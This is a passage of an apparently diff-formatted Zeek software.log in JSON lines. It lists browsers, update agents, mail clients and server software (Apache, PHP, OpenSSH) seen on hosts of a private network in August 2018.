+{"ts":"2018-08-03T23:37:37.104474Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"Microsoft-CryptoAPI","version.major":5,"version.minor":131,"version.minor2":2600,"version.minor3":5512,"unparsed_version":"Microsoft-CryptoAPI/5.131.2600.5512"} +{"ts":"2018-08-03T23:37:37.115217Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"Microsoft-CryptoAPI","version.major":5,"version.minor":131,"version.minor2":2600,"version.minor3":5512,"unparsed_version":"Microsoft-CryptoAPI/5.131.2600.5512"} +{"ts":"2018-08-03T23:37:37.200053Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"Windows-Update-Agent","unparsed_version":"Windows-Update-Agent"} +{"ts":"2018-08-03T23:37:37.210051Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Thunderbird","version.major":31,"version.minor":2,"version.minor2":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Thunderbird/31.2.0"} +{"ts":"2018-08-03T23:37:37.210942Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"Windows-Update-Agent","unparsed_version":"Windows-Update-Agent"} +{"ts":"2018-08-03T23:37:37.221073Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Thunderbird","version.major":31,"version.minor":2,"version.minor2":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Thunderbird/31.2.0"} +{"ts":"2018-08-03T23:37:37.699248Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Debian APT-HTTP","version.major":1,"version.minor":3,"version.addl":"1.0.9.2ubuntu2","unparsed_version":"Debian APT-HTTP/1.3 (1.0.9.2ubuntu2)"} +{"ts":"2018-08-03T23:37:37.700432Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Debian APT-HTTP","version.major":1,"version.minor":3,"version.addl":"1.0.9.2ubuntu2","unparsed_version":"Debian APT-HTTP/1.3 (1.0.9.2ubuntu2)"} +{"ts":"2018-08-03T23:37:37.690661Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Debian APT-HTTP","version.major":1,"version.minor":3,"version.addl":"1.0.9.2ubuntu2","unparsed_version":"Debian APT-HTTP/1.3 (1.0.9.2ubuntu2)"} +{"ts":"2018-08-03T23:37:37.696350Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Debian APT-HTTP","version.major":1,"version.minor":3,"version.addl":"1.0.9.2ubuntu2","unparsed_version":"Debian APT-HTTP/1.3 (1.0.9.2ubuntu2)"} +{"ts":"2018-08-03T23:37:39.896193Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Unspecified WebKit","version.major":538,"version.minor":1,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) HipChat/2.2.1328 Safari/538.1"} +{"ts":"2018-08-03T23:37:39.904698Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Unspecified WebKit","version.major":538,"version.minor":1,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) HipChat/2.2.1328 Safari/538.1"} +{"ts":"2018-08-03T23:37:39.961338Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft NCSI","unparsed_version":"Microsoft NCSI"} +{"ts":"2018-08-03T23:37:39.892657Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"Unspecified WebKit","version.major":538,"version.minor":1,"unparsed_version":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/538.1 (KHTML, like Gecko) HipChat/2.2.1328 Safari/538.1"} +{"ts":"2018-08-03T23:37:39.978587Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"VCSoapClient","unparsed_version":"VCSoapClient"} +{"ts":"2018-08-03T23:37:39.977989Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"APClient","unparsed_version":"APClient"} +{"ts":"2018-08-03T23:37:39.896868Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Unspecified WebKit","version.major":538,"version.minor":1,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) HipChat/2.2.1328 Safari/538.1"} +{"ts":"2018-08-03T23:37:39.990488Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft BITS","version.major":7,"version.minor":5,"unparsed_version":"Microsoft BITS/7.5"} +{"ts":"2018-08-03T23:37:39.976701Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft BITS","version.major":7,"version.minor":5,"unparsed_version":"Microsoft BITS/7.5"} +{"ts":"2018-08-03T23:37:40.004675Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Windows-Update-Agent","unparsed_version":"Windows-Update-Agent"} +{"ts":"2018-08-03T23:37:40.055233Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft BITS","version.major":7,"version.minor":5,"unparsed_version":"Microsoft BITS/7.5"} +{"ts":"2018-08-03T23:37:40.029378Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft BITS","version.major":7,"version.minor":5,"unparsed_version":"Microsoft BITS/7.5"} +{"ts":"2018-08-03T23:37:39.993787Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft BITS","version.major":7,"version.minor":5,"unparsed_version":"Microsoft BITS/7.5"} +{"ts":"2018-08-03T23:37:44.635511Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"VCSoapClient","unparsed_version":"VCSoapClient"} +{"ts":"2018-08-03T23:37:44.634671Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft NCSI","unparsed_version":"Microsoft NCSI"} +{"ts":"2018-08-03T23:37:45.666984Z","host":"192.168.0.2","host_p":80,"software_type":"HTTP::SERVER","name":"Apache","version.major":2,"version.minor":4,"version.minor2":6,"version.addl":"CentOS","unparsed_version":"Apache/2.4.6 (CentOS)"} +{"ts":"2018-08-03T23:37:45.661492Z","host":"192.168.0.2","host_p":80,"software_type":"HTTP::SERVER","name":"Apache","version.major":2,"version.minor":4,"version.minor2":6,"version.addl":"CentOS","unparsed_version":"Apache/2.4.6 (CentOS)"} +{"ts":"2018-08-03T23:37:46.082139Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"APClient","unparsed_version":"APClient"} +{"ts":"2018-08-03T23:37:46.082434Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"VCSoapClient","unparsed_version":"VCSoapClient"} +{"ts":"2018-08-03T23:37:46.080238Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"VCSoapClient","unparsed_version":"VCSoapClient"} +{"ts":"2018-08-03T23:37:46.298065Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"SLSSoapClient","unparsed_version":"SLSSoapClient"} +{"ts":"2018-08-03T23:37:46.085446Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"APClient","unparsed_version":"APClient"} +{"ts":"2018-08-03T23:37:47.113483Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Unspecified WebKit","version.major":538,"version.minor":1,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/538.1 (KHTML, like Gecko) HipChat/2.2.1328 Safari/538.1"} +{"ts":"2018-08-03T23:37:47.278235Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Office Source Engine","unparsed_version":"Office Source Engine"} +{"ts":"2018-08-03T23:37:47.279744Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Office Source Engine","unparsed_version":"Office Source Engine"} +{"ts":"2018-08-03T23:37:47.320956Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Thunderbird","version.major":31,"version.minor":2,"version.minor2":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Thunderbird/31.2.0"} +{"ts":"2018-08-03T23:37:47.284339Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"SLSSoapClient","unparsed_version":"SLSSoapClient"} +{"ts":"2018-08-03T23:37:47.270215Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"OutlookSocialConnector","version.major":1,"version.minor":0,"unparsed_version":"OutlookSocialConnector/1.0"} +{"ts":"2018-08-03T23:37:47.319562Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Thunderbird","version.major":31,"version.minor":2,"version.minor2":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Thunderbird/31.2.0"} +{"ts":"2018-08-03T23:37:47.462657Z","host":"192.168.0.53","software_type":"SMTP::MAIL_CLIENT","name":"Microsoft Outlook Express","version.major":6,"version.minor":0,"version.minor2":2900,"version.minor3":5512,"unparsed_version":"Microsoft Outlook Express 6.00.2900.5512"} +{"ts":"2018-08-03T23:37:47.481971Z","host":"192.168.0.53","software_type":"SMTP::MAIL_CLIENT","name":"Microsoft Outlook Express","version.major":6,"version.minor":0,"version.minor2":2900,"version.minor3":5512,"unparsed_version":"Microsoft Outlook Express 6.00.2900.5512"} +{"ts":"2018-08-03T23:37:47.567864Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Microsoft-CryptoAPI","version.major":6,"version.minor":1,"unparsed_version":"Microsoft-CryptoAPI/6.1"} +{"ts":"2018-08-03T23:37:48.607608Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"VCSoapClient","unparsed_version":"VCSoapClient"} +{"ts":"2018-08-03T23:37:48.666025Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"SVN","version.major":1,"version.minor":7,"version.minor2":14,"version.addl":"neon/0","unparsed_version":"SVN/1.7.14 neon/0.30.0"} +{"ts":"2018-08-03T23:37:52.852368Z","host":"192.168.0.2","host_p":80,"software_type":"HTTP::APPSERVER","name":"PHP","version.major":5,"version.minor":4,"version.minor2":16,"unparsed_version":"PHP/5.4.16"} +{"ts":"2018-08-03T23:37:52.847381Z","host":"192.168.0.2","host_p":80,"software_type":"HTTP::SERVER","name":"Apache","version.major":2,"version.minor":4,"version.minor2":6,"version.addl":"CentOS","unparsed_version":"Apache/2.4.6 (CentOS) PHP/5.4.16"} +{"ts":"2018-08-03T23:37:52.851401Z","host":"192.168.0.2","host_p":80,"software_type":"HTTP::SERVER","name":"Apache","version.major":2,"version.minor":4,"version.minor2":6,"version.addl":"CentOS","unparsed_version":"Apache/2.4.6 (CentOS) PHP/5.4.16"} +{"ts":"2018-08-03T23:37:52.851401Z","host":"192.168.0.2","host_p":80,"software_type":"HTTP::APPSERVER","name":"PHP","version.major":5,"version.minor":4,"version.minor2":16,"unparsed_version":"PHP/5.4.16"} +{"ts":"2018-08-03T23:37:52.857654Z","host":"192.168.0.2","host_p":80,"software_type":"HTTP::APPSERVER","name":"PHP","version.major":5,"version.minor":4,"version.minor2":16,"unparsed_version":"PHP/5.4.16"} +{"ts":"2018-08-03T23:37:53.040375Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Debian APT-HTTP","version.major":1,"version.minor":3,"version.addl":"1.0.9.2ubuntu2","unparsed_version":"Debian APT-HTTP/1.3 (1.0.9.2ubuntu2)"} +{"ts":"2018-08-03T23:37:53.105828Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"Firefox","version.major":31,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0"} +{"ts":"2018-08-03T23:37:53.121815Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"Firefox","version.major":31,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0"} +{"ts":"2018-08-03T23:37:53.124364Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"Firefox","version.major":31,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0"} +{"ts":"2018-08-03T23:37:53.106769Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"Firefox","version.major":31,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0"} +{"ts":"2018-08-03T23:37:53.119711Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"Firefox","version.major":31,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0"} +{"ts":"2018-08-03T23:37:53.114768Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"Firefox","version.major":31,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0"} +{"ts":"2018-08-03T23:37:53.122590Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"Firefox","version.major":31,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0"} +{"ts":"2018-08-03T23:37:53.102857Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"Firefox","version.major":31,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0"} +{"ts":"2018-08-03T23:37:53.158480Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"Firefox","version.major":31,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0"} +{"ts":"2018-08-03T23:37:53.146347Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"Firefox","version.major":31,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0"} +{"ts":"2018-08-03T23:37:53.106176Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"Firefox","version.major":31,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0"} +{"ts":"2018-08-03T23:37:53.125847Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"Firefox","version.major":31,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0"} +{"ts":"2018-08-03T23:37:53.125539Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"Firefox","version.major":31,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0"} +{"ts":"2018-08-03T23:37:53.101174Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"Firefox","version.major":31,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0"} +{"ts":"2018-08-03T23:37:53.129651Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"Firefox","version.major":31,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0"} +{"ts":"2018-08-03T23:37:53.150464Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"Firefox","version.major":31,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0"} +{"ts":"2018-08-03T23:37:53.128768Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"Firefox","version.major":31,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0"} +{"ts":"2018-08-03T23:37:53.105890Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"Firefox","version.major":31,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0"} +{"ts":"2018-08-03T23:37:53.281289Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"NVIDIA Notifius","version.major":1,"version.minor":14,"version.minor2":17,"unparsed_version":"NVIDIA Notifius v1.14.17"} +{"ts":"2018-08-03T23:37:54.562893Z","host":"192.168.0.2","host_p":80,"software_type":"HTTP::SERVER","name":"Apache","version.major":2,"version.minor":4,"version.minor2":6,"version.addl":"CentOS","unparsed_version":"Apache/2.4.6 (CentOS) PHP/5.4.16"} +{"ts":"2018-08-03T23:37:54.545927Z","host":"192.168.0.53","software_type":"SMTP::MAIL_CLIENT","name":"Microsoft Outlook Express","version.major":6,"version.minor":0,"version.minor2":2900,"version.minor3":5512,"unparsed_version":"Microsoft Outlook Express 6.00.2900.5512"} +{"ts":"2018-08-03T23:37:54.617141Z","host":"192.168.0.2","host_p":80,"software_type":"HTTP::APPSERVER","name":"PHP","version.major":5,"version.minor":4,"version.minor2":16,"unparsed_version":"PHP/5.4.16"} +{"ts":"2018-08-03T23:37:54.542008Z","host":"192.168.0.2","host_p":80,"software_type":"HTTP::SERVER","name":"Apache","version.major":2,"version.minor":4,"version.minor2":6,"version.addl":"CentOS","unparsed_version":"Apache/2.4.6 (CentOS) PHP/5.4.16"} +{"ts":"2018-08-03T23:37:54.618033Z","host":"192.168.0.2","host_p":80,"software_type":"HTTP::APPSERVER","name":"PHP","version.major":5,"version.minor":4,"version.minor2":16,"unparsed_version":"PHP/5.4.16"} +{"ts":"2018-08-03T23:37:54.602334Z","host":"192.168.0.2","host_p":80,"software_type":"HTTP::SERVER","name":"Apache","version.major":2,"version.minor":4,"version.minor2":6,"version.addl":"CentOS","unparsed_version":"Apache/2.4.6 (CentOS) PHP/5.4.16"} +{"ts":"2018-08-03T23:37:54.547964Z","host":"192.168.0.2","host_p":80,"software_type":"HTTP::APPSERVER","name":"PHP","version.major":5,"version.minor":4,"version.minor2":16,"unparsed_version":"PHP/5.4.16"} +{"ts":"2018-08-03T23:37:54.563792Z","host":"192.168.0.2","host_p":80,"software_type":"HTTP::SERVER","name":"Apache","version.major":2,"version.minor":4,"version.minor2":6,"version.addl":"CentOS","unparsed_version":"Apache/2.4.6 (CentOS) PHP/5.4.16"} +{"ts":"2018-08-03T23:37:54.617604Z","host":"192.168.0.2","host_p":80,"software_type":"HTTP::APPSERVER","name":"PHP","version.major":5,"version.minor":4,"version.minor2":16,"unparsed_version":"PHP/5.4.16"} +{"ts":"2018-08-03T23:37:54.601369Z","host":"192.168.0.2","host_p":80,"software_type":"HTTP::SERVER","name":"Apache","version.major":2,"version.minor":4,"version.minor2":6,"version.addl":"CentOS","unparsed_version":"Apache/2.4.6 (CentOS) PHP/5.4.16"} +{"ts":"2018-08-03T23:37:54.670657Z","host":"192.168.0.2","host_p":80,"software_type":"HTTP::APPSERVER","name":"PHP","version.major":5,"version.minor":4,"version.minor2":16,"unparsed_version":"PHP/5.4.16"} +{"ts":"2018-08-03T23:37:55.183937Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"MICROSOFT_DEVICE_METADATA_RETRIEVAL_CLIENT","unparsed_version":"MICROSOFT_DEVICE_METADATA_RETRIEVAL_CLIENT"} +{"ts":"2018-08-03T23:37:55.176954Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"MICROSOFT_DEVICE_METADATA_RETRIEVAL_CLIENT","unparsed_version":"MICROSOFT_DEVICE_METADATA_RETRIEVAL_CLIENT"} +{"ts":"2018-08-03T23:37:55.284869Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chrome","version.major":41,"version.minor":0,"version.minor2":2272,"version.minor3":89,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36"} +{"ts":"2018-08-03T23:37:55.557125Z","host":"192.168.0.2","host_p":80,"software_type":"HTTP::APPSERVER","name":"PHP","version.major":5,"version.minor":4,"version.minor2":16,"unparsed_version":"PHP/5.4.16"} +{"ts":"2018-08-03T23:37:55.578606Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"Wget","version.major":1,"version.minor":14,"version.addl":"linux-gnu","unparsed_version":"Wget/1.14 (linux-gnu)"} +{"ts":"2018-08-03T23:37:55.566379Z","host":"192.168.0.2","host_p":80,"software_type":"HTTP::APPSERVER","name":"PHP","version.major":5,"version.minor":4,"version.minor2":16,"unparsed_version":"PHP/5.4.16"} +{"ts":"2018-08-03T23:37:55.559949Z","host":"192.168.0.2","host_p":22,"software_type":"SSH::SERVER","name":"OpenSSH","version.major":6,"version.minor":4,"unparsed_version":"OpenSSH_6.4"} +{"ts":"2018-08-03T23:37:55.585227Z","host":"192.168.0.2","host_p":80,"software_type":"HTTP::APPSERVER","name":"PHP","version.major":5,"version.minor":4,"version.minor2":16,"unparsed_version":"PHP/5.4.16"} +{"ts":"2018-08-03T23:37:55.582930Z","host":"192.168.0.2","host_p":80,"software_type":"HTTP::APPSERVER","name":"PHP","version.major":5,"version.minor":4,"version.minor2":16,"unparsed_version":"PHP/5.4.16"} +{"ts":"2018-08-03T23:37:55.588369Z","host":"192.168.0.2","host_p":80,"software_type":"HTTP::APPSERVER","name":"PHP","version.major":5,"version.minor":4,"version.minor2":16,"unparsed_version":"PHP/5.4.16"} +{"ts":"2018-08-03T23:37:55.564162Z","host":"192.168.0.2","host_p":80,"software_type":"HTTP::APPSERVER","name":"PHP","version.major":5,"version.minor":4,"version.minor2":16,"unparsed_version":"PHP/5.4.16"} +{"ts":"2018-08-03T23:37:55.579826Z","host":"192.168.0.2","host_p":80,"software_type":"HTTP::APPSERVER","name":"PHP","version.major":5,"version.minor":4,"version.minor2":16,"unparsed_version":"PHP/5.4.16"} +{"ts":"2018-08-03T23:37:55.582334Z","host":"192.168.0.2","host_p":80,"software_type":"HTTP::APPSERVER","name":"PHP","version.major":5,"version.minor":4,"version.minor2":16,"unparsed_version":"PHP/5.4.16"} +{"ts":"2018-08-03T23:37:55.578228Z","host":"192.168.0.2","host_p":80,"software_type":"HTTP::APPSERVER","name":"PHP","version.major":5,"version.minor":4,"version.minor2":16,"unparsed_version":"PHP/5.4.16"} +{"ts":"2018-08-03T23:37:56.788489Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chrome","version.major":41,"version.minor":0,"version.minor2":2272,"version.minor3":89,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36"} +{"ts":"2018-08-03T23:37:56.796720Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chrome","version.major":41,"version.minor":0,"version.minor2":2272,"version.minor3":89,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36"} +{"ts":"2018-08-03T23:37:56.795219Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chrome","version.major":41,"version.minor":0,"version.minor2":2272,"version.minor3":89,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36"} +{"ts":"2018-08-03T23:37:56.792631Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chrome","version.major":41,"version.minor":0,"version.minor2":2272,"version.minor3":89,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36"} +{"ts":"2018-08-03T23:37:56.749538Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chrome","version.major":41,"version.minor":0,"version.minor2":2272,"version.minor3":89,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36"} +{"ts":"2018-08-03T23:37:56.790547Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chrome","version.major":41,"version.minor":0,"version.minor2":2272,"version.minor3":89,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36"} +{"ts":"2018-08-03T23:37:56.802696Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chrome","version.major":41,"version.minor":0,"version.minor2":2272,"version.minor3":89,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36"} +{"ts":"2018-08-03T23:37:56.795783Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chrome","version.major":41,"version.minor":0,"version.minor2":2272,"version.minor3":89,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36"} +{"ts":"2018-08-03T23:37:56.788040Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chrome","version.major":41,"version.minor":0,"version.minor2":2272,"version.minor3":89,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36"} +{"ts":"2018-08-03T23:37:56.795836Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chrome","version.major":41,"version.minor":0,"version.minor2":2272,"version.minor3":89,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36"} +{"ts":"2018-08-03T23:37:56.787066Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chrome","version.major":41,"version.minor":0,"version.minor2":2272,"version.minor3":89,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36"} +{"ts":"2018-08-03T23:37:56.786391Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chrome","version.major":41,"version.minor":0,"version.minor2":2272,"version.minor3":89,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36"} +{"ts":"2018-08-03T23:37:56.785950Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chrome","version.major":41,"version.minor":0,"version.minor2":2272,"version.minor3":89,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36"} +{"ts":"2018-08-03T23:37:56.790298Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chrome","version.major":41,"version.minor":0,"version.minor2":2272,"version.minor3":89,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36"} +{"ts":"2018-08-03T23:37:56.824183Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chrome","version.major":41,"version.minor":0,"version.minor2":2272,"version.minor3":89,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36"} +{"ts":"2018-08-03T23:37:56.791165Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chrome","version.major":41,"version.minor":0,"version.minor2":2272,"version.minor3":89,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36"} +{"ts":"2018-08-03T23:37:56.801935Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Chrome","version.major":41,"version.minor":0,"version.minor2":2272,"version.minor3":89,"unparsed_version":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36"} +{"ts":"2018-08-03T23:37:57.024202Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"ISX Download DLL","unparsed_version":"ISX Download DLL"} +{"ts":"2018-08-03T23:37:57.175360Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"ISX Download DLL","unparsed_version":"ISX Download DLL"} +{"ts":"2018-08-03T23:37:57.020672Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"ISX Download DLL","unparsed_version":"ISX Download DLL"} +{"ts":"2018-08-03T23:37:57.071434Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"ISX Download DLL","unparsed_version":"ISX Download DLL"} +{"ts":"2018-08-03T23:37:58.438529Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"NSIS_Inetc (Mozilla)","unparsed_version":"NSIS_Inetc (Mozilla)"} +{"ts":"2018-08-03T23:37:58.470595Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"http_parser","unparsed_version":"http_parser"} +{"ts":"2018-08-03T23:37:58.438520Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"NSIS_Inetc (Mozilla)","unparsed_version":"NSIS_Inetc (Mozilla)"} +{"ts":"2018-08-03T23:37:58.605031Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"NSIS_Inetc (Mozilla)","unparsed_version":"NSIS_Inetc (Mozilla)"} +{"ts":"2018-08-03T23:37:58.579374Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"http_parser","unparsed_version":"http_parser"} +{"ts":"2018-08-03T23:37:58.604675Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"NSIS_Inetc (Mozilla)","unparsed_version":"NSIS_Inetc 